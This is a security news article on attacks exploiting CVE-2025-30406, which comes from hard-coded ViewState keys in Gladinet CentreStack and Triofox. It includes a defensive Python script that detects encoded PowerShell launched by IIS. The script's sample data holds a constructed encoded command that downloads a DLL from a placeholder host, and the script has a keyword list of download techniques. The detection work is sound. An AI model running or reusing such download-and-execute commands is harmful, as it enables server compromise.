In early April, Huntress, a leading cybersecurity firm, revealed the active exploitation of a critical vulnerability in Gladinet CentreStack and Triofox software. The flaw, identified as CVE-2025-30406, has led to significant attacks against several organizations, with roughly 120 endpoints showing suspicious activity.
The vulnerability stems from the use of default cryptographic configurations in Gladinet’s CentreStack and Triofox software. Hard-coded cryptographic keys shipped in the configuration files mean the key is not secret to the server, leaving it vulnerable to remote code execution (RCE). Because an attacker who knows the key can produce ViewState that passes the ASPX ViewState integrity check, this misconfiguration lets them bypass ViewState protections, gain unauthorized access to servers, and execute malicious code, often with the ability to escalate to full system control.
Exploitation in the Wild: How Attackers Leverage CVE-2025-30406
The Huntress team discovered signs of exploitation in April 2025 when internal security detectors flagged unusual outbound connections originating from an irregular child process of the IIS worker process. The irregularity triggered a cascade of alerts, leading to a deeper investigation of the anomaly.
Huntress identified that attackers were using PowerShell commands to exploit the vulnerability. These commands allowed them to remotely execute code, leveraging the compromised server for further malicious activities. In one instance, Huntress traced a command sequence that involved an encoded PowerShell directive designed to download and execute a DLL file — a tactic seen in similar attacks on CrushFTP software vulnerabilities.
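The detection signal described above, an IIS worker process spawning a shell with an encoded PowerShell command, can be checked against process-creation telemetry. The following is an added example written for this article, not Huntress's detector or Gladinet's code; the event records, host paths and URL are constructed sample inputs.

```python
import base64
import re

# Constructed process-creation events in the shape of Sysmon Event ID 1 fields.
# Sample inputs written for this example, not telemetry from the investigation.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -EncodedCommand " + base64.b64encode(
         "Invoke-WebRequest http://placeholder.invalid/a.dll -OutFile C:\\Windows\\Temp\\a.dll"
         .encode("utf-16le")).decode()},
    {"ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c whoami"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -File C:\\scripts\\backup.ps1"},
]

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# PowerShell accepts any unambiguous prefix of -EncodedCommand; match the common ones.
ENC_FLAG = re.compile(r"-(?:e|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
DOWNLOAD_HINTS = ("downloadstring", "downloadfile", "invoke-webrequest",
                  "net.webclient", "start-bitstransfer")

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le", errors="replace")
    except ValueError:  # binascii.Error is a ValueError: not valid base64
        return None

def flag_iis_shell_children(events):
    """Flag shells whose parent is the IIS worker process (w3wp.exe) and note
    download-and-execute hints in the plain or decoded command line."""
    findings = []
    for ev in events:
        parent = ev["ParentImage"].rsplit("\\", 1)[-1].lower()
        child = ev["Image"].rsplit("\\", 1)[-1].lower()
        if parent != "w3wp.exe" or child not in SHELLS:
            continue
        decoded = decode_encoded_command(ev["CommandLine"])
        text = (decoded or ev["CommandLine"]).lower()
        hints = [h for h in DOWNLOAD_HINTS if h in text]
        findings.append({"child": child, "decoded": decoded, "hints": hints})
    return findings

if __name__ == "__main__":
    for finding in flag_iis_shell_children(SAMPLE_EVENTS):
        print(finding)
```

Any shell under w3wp.exe is worth a look on a CentreStack or Triofox host; the decoded command only sharpens the triage.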
Risk Assessment: A Few Hundred Servers Exposed
While the total number of exposed servers is relatively small, Huntress reports that there are still a few hundred vulnerable servers visible on the public internet via Shodan. Despite this limited exposure, the potential for significant damage is high. Attackers can exploit the flaw to infiltrate networks and move laterally, potentially compromising sensitive systems and data.
Once initial access had been gained, Huntress observed that the threat actors continued to move laterally within the affected networks. They used tools like MeshCentral to maintain remote access and attempted to add new user accounts and execute enumeration commands. They also deployed default Impacket scripts, which are commonly used in post-exploitation activity, to further extend their control over compromised systems.
Patches Released: Gladinet Takes Action to Mitigate the Flaw
Gladinet has responded to the vulnerability by releasing patches to fix the critical issue. Huntress confirmed that the patches were effective in halting exploitation based on their proof-of-concept tests. The patches aim to close the cryptographic configuration gap that had exposed Gladinet’s software to exploitation.
The Urgent Need for Patching and Vigilance
The exploitation of CVE-2025-30406 highlights the importance of timely patching and secure configuration management in software applications. Organizations using Gladinet CentreStack or Triofox are urged to apply the latest patches immediately to mitigate the risk of remote code execution. Additionally, businesses should review their security practices and ensure they have proactive measures in place to detect and respond to zero-day exploits.
As this case demonstrates, attackers often follow established playbooks when exploiting vulnerabilities. Organizations should stay vigilant and continually monitor their systems for abnormal activity, especially where file transfer and file sharing platforms are exposed to the internet. Enhanced monitoring solutions, such as intrusion detection systems (IDS), can help detect the early stages of exploitation and minimize the impact of such attacks.